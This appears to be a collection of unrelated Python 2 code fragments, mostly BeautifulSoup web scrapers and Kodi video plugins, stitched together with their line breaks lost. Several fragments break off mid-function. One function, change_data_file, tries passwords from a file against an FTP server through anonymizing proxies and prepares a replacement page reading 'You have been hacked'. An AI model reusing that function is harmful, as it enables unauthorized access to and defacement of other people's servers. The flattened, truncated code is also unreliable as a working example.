def scrape_home(): page = requests.get(site) soup = BeautifulSoup(page.text) soup.prettify() for anchor in soup.findAll('a',{'class':'newsitem2'}): try: #print "[+] Found article:" title = anchor['title'] link = anchor['href'] dts = datetime.strptime(link[9:17], '%Y%m%d') # chop-chop goes the string articleId = link[23:32] # more chop-chop, thx for consistent strings # Debugging, printing output to screen #print "Title: " + anchor['title'] #print "Date: " + str(dts) #print "Link: " + anchor['href'] #print "ID: " + articleId #print "" #print dts # Parse the link # Pull out Date, ID, and full Link if len(title) > 0: # If the link has a title, save into list links.append(site + link) titles.append(title) storyID.append(articleId) except: pass # Else, move on, don't save link
def scrapeDataset(index): try: record = {} record['id'] = index url = baseUrl + str(index) record['url'] = url html = scraperwiki.scrape(url) soup = BeautifulSoup(html) print soup.prettify() content = soup.find('div',id='content') record['title'] = content.find('h1',{'class':'title'}).text ps = content.findAll('p') # record['created'] = ps[0].text record['categories'] = ps[1].text # record['description'] = ps[3:len(ps)] table = content.find('table',{'class':'dataset'}) trs = table.findAll('tr') record['extent'] = trs[0].findAll('td')[0].text record['agency'] = trs[1].findAll('td')[0].text record['update_frequency'] = trs[2].findAll('td')[0].text record['date_range'] = trs[3].findAll('td')[0].text record['date_published'] = trs[4].findAll('td')[0].text record['date_of_last_revision'] = trs[5].findAll('td')[0].text record['license_summary'] = trs[6].findAll('td')[0].find('a')['href'] distributions = trs[7:] dists = {} for dist in distributions: dists[dist.find('th').text] = dist.find('td').text record['distributions'] = dists # print(dists) scraperwiki.sqlite.save(unique_keys=['url'], data=[record]) # print record except: None
def getWishes(pseudo): lines = [] pages = getPages(pseudo) if pages == 0: return for i in range(1,pages+1): page = urllib2.urlopen(url+'/page-'+str(i)).read() soup = BeautifulSoup(page) soup.prettify() for empty in soup.findAll("li",{"class" : "elco-collection-item-empty d-emptyMessage"}): print "Aborting : there isn't a single movie in your wishlist yet :(" return for wish in soup.findAll("li",{"class" : "elco-collection-item"}): wish_json = '<li>' for element_title in wish.findAll("div",{"class" : "elco-collection-content"}): exist = False for title_original in element_title.findAll('span',{'class':'elco-original-title'}): link = getLink(title_original.text.encode('utf-8')) wish_json = wish_json + '<a href="' + str(link) + '">' + title_original.text.encode('utf-8') + '</a></li>' lines.append(wish_json) exist = True for title in element_title.findAll('a',{"class": "elco-anchor"}): if exist is False: link = getLink(title.text.encode('utf-8')) wish_json = wish_json + '<a href="' + str(link) + '">' + title.text.encode('utf-8') + '</a></li>' lines.append(wish_json) file = open(pseudo+'.html','w+') file.write('<html><body>') for line in lines: file.write(line) file.write('</body></html>') file.close()
def scrape_article(link): r = requests.get(link) soup = BeautifulSoup(r.text) soup.prettify() story_text = soup.findAll('span',{'class':'StoryText'}) stories.append(story_text) return True
def get_soup(self, geo_query_string): MAX_NUM_TRIES = 5 if not geo_query_string: return(None) try: return(self._geo_soups[geo_query_string]) except KeyError: num_tries = 0 success = False getter = get_geo_page while (num_tries < MAX_NUM_TRIES and not success): raw_html = getter(geo_query_string) soup = BeautifulSoup(raw_html) # Verify we got a valid page try: assert(soup.find(text="Status")) success = True print("Got geo page for %s" %geo_query_string) except: print("Couldn't get page for %s. Sleeping and will try again" %geo_query_string) time.sleep(2) num_tries += 1 getter = uncached_get_geo_page if not success: print soup.prettify() raise Exception("Page for %s not retrieved. Perhaps server down or no internet connection?" %geo_query_string) self._geo_soups[geo_query_string] = soup return(soup)
def parse_speech(url): data = {} html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() content = soup.find('div', {'id' : 'mainColumn' }) title = content.h1.text author = content.find('p', {'class' : 'detail'}).text[2:] position = content.p.nextSibling.text date_and_place = content.find('p', {'class' : 'detail alternate'}) date = date_and_place.text.partition(',')[0] place = date_and_place.text.partition(',')[2] body = content.findAll(lambda tag: len(tag.name) == 1 and not tag.attrs) # Re-join the body, otherwise it shows up with array cruft in the JSON body = ''.join(str(tag) for tag in body) data['title'] = title data['body'] = body data['minister_name'] = author data['minister_position'] = position data['date'] = date data['where'] = place data['source_url'] = url data['department'] = 'Business, Innovation and Skills' print "Save: " + str(data) scraperwiki.sqlite.save(["title", "source_url"], data)
def scrapeyear(url, year): seen_before = scraperwiki.metadata.get(url) if seen_before is not None: print "Seen before - skip: " + url return else: print "vinnum ur " + year data = {} html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() table = soup.find('table', {'id' : 'mot-tafla'}) trs = table.findAll('tr') for td in trs[1:]: items = td.findAll('td') slod = 'http://www.ksi.is/mot/motalisti/' + items[1].a['href'] motanumer = re.sub('http:\//www.ksi.is\/mot\/motalisti\/urslit-stada/\?MotNumer=','',slod) mot = items[1].text flokkur = items[3].text data['slod'] = slod data['year'] = year data['motanumer'] = motanumer data['flokkur'] = flokkur data['mot'] = mot #print data print "vistum " + year scraperwiki.datastore.save(["mot", "year"], data) scraperwiki.metadata.save(url,"1")
def getcontentparas(self, html, domain): bs = BeautifulSoup(html) bs.prettify() body = [] try: if domain == "engadget": body = bs.findAll('div', attrs={'class':'post_body'})[0].contents body = body[2:len(body)-4] elif domain == "mashable": body = bs.findAll('div', attrs={'class':'description'}) elif domain == "techcrunch": body = bs.findAll('div', attrs={'class':'body-copy'})[0].contents elif domain == "huffingtonpost": body = bs.findAll('div', attrs={'class':'entry_body_text'})[0].contents body = body[3:len(body)-10] elif domain == "treehugger": body = bs.findAll('div', attrs={'id':'entry-body'})[0].contents elif domain == "businessinsider": x = bs.findAll('div', attrs={'class':'KonaBody post-content'}) if type(x) is list: body = x[0].contents body = body[1:len(body)] elif x: body = x else: print "body not initialized: " #print body blogparas = "" blogparas = self.getparas(body) return blogparas except: print "para not found: " return "0"
def scrape_safn(url): html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() # Forum i gegnum alla tengla sem hafa class=headnews frettir = soup.findAll('a', { "class" : "headnews" })
def scrape_videos(self, br, htmlscraper, parser, wpPost, videoUrls): postList = wpPost.get_posts(10000) for i in range(len(videoUrls)): try: print "---------------------" + str(i) + " from " + str(len(videoUrls)) + "------------------------" title = htmlscraper.convert_hypen_into_space(parser.split_url(videoUrls[i])) print "title: " + htmlscraper.uppercase_first_letter_from_string(title) if (self.dataHandler.is_this_item_on_the_list(title, postList)): print "Content already posted" else: print "Video scraping started ..." tags = htmlscraper.convert_title_to_categories(str(title)) soup = BeautifulSoup(br.scrap_website(videoUrls[i])) soup.prettify() thumbnail = parser.get_thumbnail(soup) print "thumbnail: " + thumbnail paraVideo = parser.parse_video_id(videoUrls[i]) iframe = parser.create_video_iframe(paraVideo[0], paraVideo[1]) print "iframe: " + iframe video_duration = parser.get_duration(soup) print "video duration: " + video_duration embedurl = htmlscraper.parse_src_from_video_iframe(iframe) print "embedurl " + embedurl duration_for_snippets = parser.prepare_duration_for_snippets(video_duration) print "duration for snippets: " + duration_for_snippets print "Wordpress post creator starting ..." wpPost.createPost(title, thumbnail, iframe, video_duration, duration_for_snippets, tags, embedurl) print "Scraped video [OK]" except: pass
def getDescription(url): sizeToReturn = 200 request = urllib2.Request(url) #create a request request.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4') #http://whatsmyuseragent.com/ opener = urllib2.build_opener() feeddata = opener.open(request).read() #feeddata is the html data received opener.close() request.close() soup = BeautifulSoup(''.join(feeddata)) #make it into beautifulsoup soup.prettify() #correct errors paras = soup.findAll('p') i = 0 text = '' for pa in paras: for res in pa.findAll(text=True): if(i > 2): text = text + res i = i + 1 textToReturn = text.replace('\n',' ') if(len(textToReturn) < sizeToReturn): while(len(textToReturn) < sizeToReturn): textToReturn = textToReturn + " " return textToReturn[0:sizeToReturn] else: return textToReturn[0:sizeToReturn]
def getTVTree(url): data = common.getURL(url) scripts = re.compile(r'<script.*?script>', re.DOTALL) data = scripts.sub('', data) style = re.compile(r'<style.*?style>', re.DOTALL) data = style.sub('', data) tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES) atf = tree.find(attrs={'id': 'atfResults'}) if atf == None: print tree.prettify() return False atf = tree.find(attrs={'id': 'atfResults'}).findAll('div', recursive=False) try: btf = tree.find(attrs={ 'id': 'btfResults' }).findAll( 'div', recursive=False) atf.extend(btf) del btf except: print 'AMAZON: No btf found' nextpage = tree.find(attrs={ 'title': 'Next page', 'id': 'pagnNextLink', 'class': 'pagnNext' }) del data return atf, nextpage
def read_manga(params): link='http://manga24.ru/%s'%params['m_path'] print link http = GET(link) if http == None: return False beautifulSoup = BeautifulSoup(http) beautifulSoup.prettify() body=str(beautifulSoup).split('\n') d_f=None i_f=None imgs=[] pat=re.compile('[a-zA-Z0-9-_.!]+.[png|jpg|PNG|JPG]', re.S) for line in body: if line.split(':')[0].find('dir')>0 and not d_f: url=line.split('"')[1].replace('\/','/') d_f=True if line.split(':')[0].find('images')>0 and not i_f: img = re.findall(pat, line) i_f=True for ism in img: try: mm=xbmcgui.ListItem(ism,addon_icon,addon_icon) xbmcplugin.addDirectoryItem(hos,url+ism,mm,False) print ism except: pass xbmcplugin.endOfDirectory(handle=hos, succeeded=True, updateListing=False, cacheToDisc=True)
def __getStationImage(self): img = None opener = urllib2.build_opener(urllib2.HTTPCookieProcessor) soup = None print "Connecting to " + self.url try: response = opener.open(self.url) data = response.read() soup = BeautifulSoup(data) soup.prettify() print "Connection OK" except urllib2.HTTPError: print "ERROR in connection" if (soup): img = str(soup) try: img = re.findall('[fF]oto\=.+\&\;lenguaje', img)[0] img = re.sub('([fF]oto\=\s?|\&\;lenguaje)', '', img) img = 'http://www.ingurumena.ejgv.euskadi.net' + urllib.quote(img) except: img = None return img
def query_chaoscards (card_number): result = {} card_number = card_number.replace ("_", ":").replace ("-", ":"); print card_number; url = 'http://www.chaoscards.co.uk/rss/1/productlistings_rss/c84:' + card_number page = urllib2.urlopen (url).read () soup = BeautifulSoup (page) item = soup.find ('item'); if not hasattr (item, 'guid'): return; url = item.guid.contents[0] page = urllib2.urlopen (url).read () soup = BeautifulSoup (page) soup.prettify () price = soup.find (id='price_break_1').span.span.span.contents[0] r = price_regex.search(str (price)) price = r.groups ()[0] result = { 'card_number': card_number, 'card_name': soup.find (id='product_title').contents[0], 'price': price } return result
def query_koolkingdoms (card_number): result = {} url = 'http://www.koolkingdom.co.uk/acatalog/info_' + card_number + '.html'; try: try: #Attempt to get page with standard URL page = urllib2.urlopen(url).read(); except urllib2.HTTPError: #On failure attempt alternative page = urllib2.urlopen(url.replace ("_", "-")).read() except urllib2.HTTPError: print card_number + " could not be found" return result; soup = BeautifulSoup(page) soup.prettify() card_name = soup.title.string price = soup.find('actinic:prices').span r = price_regex.search(str (price)) price = r.groups ()[0] result = { 'card_number': card_number, 'card_name': card_name, 'price': price } return result;
def google_backlinks(domain): try: logger.info("begin google_backlinks for domain %s" % domain) import urllib2 from BeautifulSoup import BeautifulSoup #from http://stackoverflow.com/questions/802134/changing-user-agent-on-urllib2-urlopen url = "https://www.google.com/search?q=%s".format(domain,domain) keyword = '"{0}" -site:{1}'.format(domain,domain) url = (url % urllib.quote_plus(keyword)) logger.info(url) headers = { 'User-Agent' : 'Mozilla/5.0' } req = urllib2.Request(url, None, headers) html = urllib2.urlopen(req).read() soup = BeautifulSoup(html) soup.prettify() result =soup.find("div",{"id": "resultStats"}).string logger.info("Results %s" % result) if result: if result=='1 result': return 1 result = result.lower().replace("about ","") result = result.replace(" results","") result = result.replace(',','') else: result= 0 logger.info("google_backlinks domain %s results %s" % (domain, result)) return result except Exception,e: logger.error(e) return -1
def httpParse(tempname): """parse http or https links in the downloaded webpage""" the_page = open('temp/'+tempname, 'r').read() soup = BeautifulSoup(the_page) soup.prettify() all_links = [] temp_links = [] #TODO: add images or other links apart from href? #TODO: this saves all links local and http/https - need to parse for anchor in soup.findAll('a', href=True): #print anchor['href'] # use unicode to make links non-navigable link = unicode(anchor['href']) all_links.append( link ) # create link set from list_of_links split_link = link.split("/") # if external link if 'http' in split_link[0]: temp_links.append(split_link[2]) #for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')): # if link.has_attr('href'): # print link['href'] #return link['href'] # take set of external links link_set = list(set(temp_links)) return all_links, link_set
def processEpisodes(url): data = common.getURL(url) remove = re.compile('<script.*?script>', re.DOTALL) data = re.sub(remove, '', data) remove = re.compile('<\\!--.*?-->', re.DOTALL) data = re.sub(remove, '', data) htmldata = demjson.decode(data)['display'] remove = re.compile('"<div.*?div>"') htmldata = re.sub(remove, '""', htmldata) tree=BeautifulSoup(htmldata, convertEntities=BeautifulSoup.HTML_ENTITIES) print tree.prettify() episodes = tree.findAll('div',attrs={'class':re.compile('video-image-wrapper video')}) if len(episodes) == 0: return False for episode in episodes: print episode.prettify() url = episode.find('a')['href'] name = episode.find('img')['title'] thumb = episode.find('img')['src'] u = sys.argv[0] u += '?url="'+urllib.quote_plus(url)+'"' u += '&mode="lifetime"' u += '&sitemode="playepisode"' infoLabels={ "Title":name, "TVShowTitle":common.args.name} common.addVideo(u,name,thumb,infoLabels=infoLabels) return True
def scrape_skjalfta(url): html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() table = soup.find ('table', { 'width' : '80%' }) tr = table.findAll('tr') for tr in tr: date = tr.findNext('td') date_store = re.sub(" \d+:\d+","",date.text) date_time = date.text time = re.sub("\d+-\d+-\d+ ","",date.text) location=date.findNext('td') lat = location.text[:4] lng = location.text[5:] latlng = [lat,lng] latlng_float= map(float, latlng) size=location.findNext('td') distance=size.findNext('td') landmark=distance.findNext('td') quake['date'] = date_store quake['time'] = time quake['date_time'] = date_time quake['lat'] = lat quake['lng'] = lng quake['size'] = size.text quake['distance'] = distance.text quake['landmark'] = landmark.text print quake scraperwiki.datastore.save(["date_time"], quake, latlng=(latlng_float))
def play(): smilurl=common.args.url swfUrl = 'http://www.bravotv.com/_tp/pdk/swf/flvPlayer.swf' if (common.settings['enableproxy'] == 'true'):proxy = True else:proxy = False data = common.getURL(smilurl,proxy=proxy) tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES) print tree.prettify() rtmpbase = tree.find('meta') if rtmpbase: rtmpbase = rtmpbase['base'] items=tree.find('switch').findAll('video') hbitrate = -1 sbitrate = int(common.settings['quality']) * 1024 for item in items: bitrate = int(item['system-bitrate']) if bitrate > hbitrate and bitrate <= sbitrate: hbitrate = bitrate playpath = item['src'] if '.mp4' in playpath: playpath = 'mp4:'+playpath else: playpath = playpath.replace('.flv','') finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true" else: items=tree.find('switch').findAll('video') hbitrate = -1 sbitrate = int(common.settings['quality']) * 1024 for item in items: bitrate = int(item['system-bitrate']) if bitrate > hbitrate and bitrate <= sbitrate: hbitrate = bitrate finalurl = item['src'] item = xbmcgui.ListItem(path=finalurl) xbmcplugin.setResolvedUrl(pluginhandle, True, item)
def addSection(link, title): if not 'http' in link: page = urllib2.urlopen('http://www.paulgraham.com/'+link).read() soup = BeautifulSoup(page) soup.prettify() else: page = urllib2.urlopen(link).read() section = ez_epub.Section() try: section.title = title print section.title if not 'http' in link: font = str(soup.findAll('table', {'width':'455'})[0].findAll('font')[0]) if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100: content = font else: content = '' for par in soup.findAll('table', {'width':'455'})[0].findAll('p'): content += str(par) for p in content.split("<br /><br />"): section.text.append(genshi.core.Markup(p)) #exception for Subject: Airbnb for pre in soup.findAll('pre'): section.text.append(genshi.core.Markup(pre)) else: for p in str(page).replace("\n","<br />").split("<br /><br />"): section.text.append(genshi.core.Markup(p)) except: pass return section
def send_sms(toMobileNo, textMsg): token = open_main_and_get_token() post_props, form = open_send_sms_url(token) mob_no_param = get_mob_no_param(form) token_param = get_token_param(form) post_props[mob_no_param] = toMobileNo post_props[token_param] = token post_props['textArea'] = textMsg post_props['nrc'] = 'nrc' post_props['wasup'] = 'push358' post_props['HiddenAction'] = 'instantsms' post_props['chkall'] = 'instantsms' post_data = urllib.urlencode(post_props) if (_DEBUG == True): print 'Generated Post Props:' print post_props print 'Generated Post_data:' print post_data fp = URL_OPENER.open(WAY_TO_SMS_SEND_SMS_POST_URL,post_data) if (_DEBUG == True): soup=BeautifulSoup(fp.read()) print soup.prettify() print '\tSMS chunk sent!'
def play(): smilurl=common.args.url #+'&manifest=m3u' swfUrl = 'http://www.syfy.com/_utils/video/codebase/pdk/swf/flvPlayer.swf' if (common.settings['enableproxy'] == 'true'):proxy = True else:proxy = False data = common.getURL(smilurl,proxy=proxy) tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES) print tree.prettify() rtmpbase = tree.find('meta') if rtmpbase: rtmpbase = rtmpbase['base'] items=tree.find('switch').findAll('video') hbitrate = -1 sbitrate = int(common.settings['quality']) * 1024 for item in items: bitrate = int(item['system-bitrate']) if bitrate > hbitrate and bitrate <= sbitrate: hbitrate = bitrate playpath = item['src'] if '.mp4' in playpath: playpath = 'mp4:'+playpath else: playpath = playpath.replace('.flv','') finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true" else: #open m3u data = common.getURL(smilurl+'&manifest=m3u',proxy=proxy) tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES) print tree.prettify() items=tree.find('seq').findAll('video') item=items[0] hbitrate = -1 sbitrate = int(common.settings['quality']) * 1024 #for item in items: # bitrate = int(item['system-bitrate']) # if bitrate > hbitrate and bitrate <= sbitrate: # hbitrate = bitrate m3u8url = item['src'] origfilename=m3u8url.split('/')[-1] data = common.getURL(m3u8url,proxy=proxy) # lines=data.splitlines() #print "D",data #bitrate on url isn't used #.split('b__=')[0]+'b__='+common.settings['quality'] #print data items=re.compile('BANDWIDTH=(\d*).*\n(.*)(\n)').findall(data) #print "%^&^",items for item in items: #print line bitrate = int(item[0]) if bitrate > hbitrate and bitrate <= sbitrate: hbitrate = bitrate # print "BR",bitrate filename = item[1] finalurl=m3u8url.replace(origfilename,filename) item = xbmcgui.ListItem(path=finalurl) xbmcplugin.setResolvedUrl(pluginhandle, True, item)
def summary(self): self.infolist.sort(key=lambda generalinfo: generalinfo.contestrank) now = datetime.datetime.now() otherStyleTime = now.strftime("%Y-%m-%d") timestring = time.asctime() file = open('Summary@' + otherStyleTime + '.html', 'w') filecopy = open('Summary.html', 'w') body = '' head = ''' <html> <head> <meta http-equiv="Content-Type" content="text/html" charset = "utf-8"> <title>Board|Contest Rating System</title> <link rel="stylesheet" href="board.css" type="text/css" /> </head> <body> <div class="container"> ''' tail = '<div class="footer"><p>Generated At : ' + timestring + '</p></div></body></html>' title = '<h1> NWPU Team Contest @ ' + otherStyleTime + '</h1>' tablehead = ''' <table id="crsboard"> <thead> <th> Rank </th> <th> Nickname </th> <th> TeamName </th> <th> Member </th> <th> New Rating </th> <th> Old Rating </th> <th> Change </th> </thead>''' cnt = 1 for i in self.infolist: cnt += 1 if cnt % 2 == 0: body += '<tr class="row1">' + '\n' if 1: body += self.rankcolor(i.contestrank) body += '<th> ' + str(i.nickname) + ' </th>\n' body += '<th> ' + (i.realname).decode('utf-8') + ' </th>\n' body += self.numcolor(int(i.newrating)) + '\n' body += self.numcolor(int(i.oldrating)) + '\n' body += self.posneg(int(i.newrating - i.oldrating)) + '\n' body += '</tr>' + '\n' if cnt % 2 == 1: body += '<tr class="row2">' + '\n' if 1: body += self.rankcolor(i.contestrank) body += '<th> ' + str(i.nickname) + ' </th>' + '\n' body += '<th> ' + (i.realname) + ' </th>' + '\n' body += self.numcolor(int(i.newrating)) + '\n' body += self.numcolor(int(i.oldrating)) + '\n' body += self.posneg(int(i.newrating - i.oldrating)) + '\n' body += '</tr>' + '\n' htmlraw = head + title + tablehead + body + tail htmlcode = BeautifulSoup(htmlraw) file.write(htmlcode.prettify()) filecopy.write(htmlcode.prettify())
def change_data_file(self, login_to_server, ip, file_name, ): self.login_to_server = login_to_server # self.pas_for_ftp = pas_for_ftp self.ip = ip self.file_name = file_name file = "pasw.txt" br = Anon(useragent, proxies) pf = open(file, 'r') #open a password file for line in pf.readlines(): pas_for_ftp = line.strip('\r').strip('\n') try: print "login_to_server - ", self.login_to_server # print "pas_for_ftp - ", self.pas_for_ftp print "IP - ", self.ip print "file_name - ", self.file_name url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/" print url url2 = url + self.file_name print url2 response = br.open(url2) soup = BeautifulSoup(response.get_data()) b = soup.prettify() tag = soup.body tag.clear() soup = BeautifulSoup("<body></body>") original_tag = soup.body new_tag = soup.new_tag("p") original_tag.append(new_tag) tag = soup.p tag.string = "You have been hacked" a = soup.prettify() print "File on server: ", b print "File's change: ", a request = Request(url2, data=b) request.get_host() request.get_data() print "Done!" break # response = br.open(url2) # html = br.response().get_data().replace("</b>", "< /b>") # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html = br.response().get_data().replace(b, a) # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html2 = br.request().get_data().replace(b, a) # mechanize.request_host(html2) except: print "[*]password", pas_for_ftp, "is incorrect"
def _fix_document(self, doc, use_soup=False): if use_soup: soup = BeautifulSoup(doc) soup.prettify() doc = unicode(soup) else: doc = tidy(doc) return doc
def process_response(self, request, response): if 'text/html' in response['Content-Type']: soup = BeautifulSoup(response.content) try: response.content = soup.prettify(spacesPerLevel=4) except TypeError, e: # not alanjds' flavor of Soup # so, use official Soup flavor... response.content = soup.prettify()
def scrape_aircraft(url): aircraft = {} html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() br = soup.findAll('br') for br in br: br.replaceWith(', ') #First table table = soup.find('table', {'class' : 'craft' }) registration_id = table.findNext('tr') aircraft['registration_id'] = re.sub("Einkennisstafir:","",registration_id.text) registration_nr = registration_id.findNext('tr') aircraft['registration_nr'] = re.sub('Skr\xe1ningarn\xfamer:',"",registration_nr.text) registration_id = re.sub("Einkennisstafir:","",registration_id.text) #Second table table = table.findNext('table', {'class' : 'craft' }) make = table.findNext('tr') aircraft['make'] = re.sub("Tegund:","",make.text) production_year = make.findNext('tr') aircraft['production_year'] = re.sub("Framlei\xf0slu\xe1r:","",production_year.text) serial_nr = production_year.findNext('tr') aircraft['serial_nr'] = re.sub("Ra\xf0n\xfamer:","",serial_nr.text) #Third table table = table.findNext('table', {'class' : 'craft' }) max_weight = table.findNext('tr') aircraft['max_weight'] = re.sub("H\xe1marks\xfeungi:","",max_weight.text) passenger_nr = max_weight.findNext('tr') passenger_nr = re.sub('Far\xfeegafj\xf6ldi:',"",passenger_nr.text) if passenger_nr == u"Ekki skr\xe1\xf0ur": passenger_nr = "n/a" aircraft['passenger_nr'] = passenger_nr #Fourth table table = table.findNext('table', {'class' : 'craft' }) owner = table.findNext('tr') aircraft['owner'] = re.sub("Eigandi:","",owner.text) address = owner.findNext('tr') address = address.findNext('td') address = address.findNext('td') aircraft['owner_address'] = address.text #Fifth table table = table.findNext('table', {'class' : 'craft' }) operator = table.findNext('tr') aircraft['operator'] = re.sub("Umr\xe1\xf0andi:","",operator.text) address = operator.findNext('tr') address = address.findNext('td') address = address.findNext('td') aircraft['operator_address'] = address.text scraperwiki.datastore.save(["registration_id"], aircraft) scraperwiki.metadata.save(url, '1') print aircraft
def scrape_test_center_next_page(url): html = scraperwiki.scrape(url) soup = BeautifulSoup(html) soup.prettify() div = soup.find('div', 'formtext first') links = div.findAll('a') for a in links: url = 'http://www.dft.gov.uk/dsa/' + a['href'] scrape_test_center(url)
import urllib2, os from BeautifulSoup import BeautifulSoup page = urllib2.urlopen( 'http://www.dell.com/support/article/de/de/debsdt1/sln308587/microprocessor-side-channel-vulnerabilities-cve-2017-5715-cve-2017-5753-cve-2017-5754-impact-on-dell-products?lang=en#Dell_Products_Affected' ).read() soup = BeautifulSoup(page) soup.prettify() for row in soup.findAll('table')[1].findAll('tbody')[0].findAll('tr'): name = row.findAll('td')[0].text new_version = row.findAll('td')[1].text try: # if 1: # t = # print name line = os.popen("grep '%s' README.md" % name).read() old_version = line.split(" | ")[1].replace(" ", "").replace("\n", "") try: status = line.split(" | ")[3].split(" ")[0] except: status = "no" # print status if status == "no": if old_version != new_version and new_version != "In Process": # print old_version new_version_link = row.findAll('td')[1].findAll('a')[0] page_version = urllib2.urlopen( 'http:%s' % new_version_link['href']).read() soup_version = BeautifulSoup(page_version)
def getLinks(i, limit): global j global visitedHash global JuLiDoTheThing global GlobalDictForWordFreq last = False while (i < limit): # if (i < limit): TempDictForWordFreq = dict() # This if statement writes to the file when the document counter is # divisible by 500. if (i % 500 == 0 and i != 0): print "I am going to write to the file because we've hit a mulitple of 500! WHOOOO!!!" writeToFile(last) ## This try catch block allows the file to be written to, even if the ## queue is empty, or the link is unable to be opened. ## TODO: Make sure that if the queue is empty, it isn't an infinite loop. try: # Get the next URL on the queue and open it url = linksQ.dequeue() except: print "The queue is empty!! Good for you!!" writeToFile(last) return if (delay): t0 = time.time() slowDown() try: # html = urllib.urlopen(url, timeout=4).read() html = urllib.urlopen(url).read() soup = BeautifulSoup(html) except: print "You couldn't open the URL:", url # i += 1 # writeToFile(last) last = True # getLinks(i, limit) continue # print "Here is the url we are checking: " + url # print "When you try to get the visisted hash link file:", visitedHash.get(url, False) # print "" # If we have visited the URL before, do not find the links a second time if (visitedHash.get(url, False) != False): i += 1 print "You've already been to " + str(i), url # Instead, move to the next url in the queue continue # If it is a new URL, find the links and tokens in the webpage else: for link in soup.findAll('a'): # Gets the new URLs for each webpage newLink = (link.get('href')) if (newLink != None): # Check if the URL is absolute or relative if (len(newLink) > 7 and (re.match(r"http\:\/\/", newLink[0:7]) or re.match(r"https\:\/\/", newLink[0:8]))): if (re.search(r"muhlenberg", newLink)): if not (re.search(r"\#", newLink)): try: ## Checks to make sure the the URLs being added ## are not PDF files. if not (re.match(r".*.pdf$", str(newLink)) or re.match( r".*sync\.muhlenberg\.edu.*", str(newLink)) or re.match( r".*capstone.*", str(newLink)) or re.match( r".*blogs.*", str(newLink)) or re.match( r"http://www.muhlenberg.edu\w+.html", str(newLink))): if not (re.match( r".*javascript.*", str(newLink)) or re.match( r".*webapp.*", str(newLink)) or re.match( r".*edumailto.*", str(newLink))): add = True for nope, value in evadeAndConquor.items( ): # print nope if re.search( r".*" + nope + r".*", str(newLink)): add = False # print "found it", nope if add: # If the link has not been visited before, # add it to the queue. if (visitedHash.get( newLink, False) == False): linksQ.enqueue(newLink) except: print "Your URL is not a string:", newLink else: if not (re.search(r"\#", newLink)): ## TODO: MAKE SURE THIS WORKS FOR EVERY CASE. end = url.find(r'/', 7) newLink = url[0:end] + newLink try: ## Checks to make sure the the URLs being added ## are not PDF files. if not (re.match(r".*.pdf$", str(newLink)) or re.match(r".*sync\.muhlenberg\.edu.*", str(newLink)) or re.match(r".*capstone.*", str(newLink)) or re.match(r".*blogs.*", str(newLink)) or re.match( r"http://www.muhlenberg.edu\w+.html", str(newLink))): if not (re.match(r".*javascript.*", str(newLink)) or re.match( r".*webapp.*", str(newLink)) or re.match(r".*edumailto.*", str(newLink))): add = True for nope, value in evadeAndConquor.items( ): # print nope if re.search( r".*" + nope + r".*", str(newLink)): add = False # print "found it", nope if add: # If the link has not been visited before, # add it to the queue. if (visitedHash.get( newLink, False) == False): linksQ.enqueue(newLink) except: print "Your URL is not a string:", newLink i += 1 tempDoc = open("Files/Documents/doc" + str(i) + ".txt", 'w') for line in soup.prettify(): tempDoc.write(line) tempDoc.close() # This will find all of the tokens in the file and store them in # a hash of tokens with their doc# and freq (TempDictForWordFreq) and # a hash of tokens and how many docs they appear in and which for line in soup.findAll('p'): if not line.find('iframe'): line = line.text if not (re.match(r"http\:\/\/.*", line)): if (line != None): words = line.split(' ') for word in words: if (re.search( r"\.([com]|[org]|[net]|[int]|[edu]|[gov])", word)): word = word.replace(word, "") ## TODO: Maybe remove hypens? # token = re.sub(r"and", "", word) token = re.sub(r"&\w*;", "", word) token = re.sub(r"[^A-Za-z\']*", "", token) token = re.sub(r"[\t]", "", token) token = token.lower() if (token != "" and token != " "): if (stemWords): token = stemmer.lemmatize(token, 'v') token = stemmer.lemmatize(token, 'n') token = token.strip() if (len(token) > 1): if (removeStopWords): ## If the token isnt a stop word, add it. if (stopWords.get(token, False) == False): if not re.search( r'\r\n', token): TempDictForWordFreq[ token] = int( TempDictForWordFreq .get(token, 0)) + 1 GlobalDictForWordFreq[ token] = int( GlobalDictForWordFreq .get(token, 0)) + 1 else: TempDictForWordFreq[token] = int( TempDictForWordFreq.get( token, 0)) + 1 GlobalDictForWordFreq[token] = int( GlobalDictForWordFreq.get( token, 0)) + 1 j += 1 i = j for key, val in TempDictForWordFreq.items(): # print "current word", key # print "was it found in the perminate dictionary", JuLiDoTheThing.get(key, False) != False if (JuLiDoTheThing.get(key, False) != False): FerricksList = JuLiDoTheThing.get(key, False) FerricksList.append([i, val]) JuLiDoTheThing[key] = FerricksList else: FerricksList = list() FerricksList.append([i, val]) JuLiDoTheThing[key] = FerricksList # If we haven't visited the file before, add it to the visitedHash # if (visitedHash.get(url, False) == False): visitedHash[url.strip()] = i print "Document", i, "has been processed." last = False
infile.close() if options.replace: outfile = open(infilepath, 'w') else: try: outfilepath = args[1] except IndexError: outfile = sys.stdout else: outfile = open(outfilepath, 'w') soup = BeautifulSoup(inhtml) parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("lxml")) doc = parser.parse(soup.prettify()) """ Convert headings to hgroups where appropriate --------------------------------------------- """ if options.hgroup: hgroupise(doc) if options.section: sectionise(doc) if options.normalize: normalize(doc) """
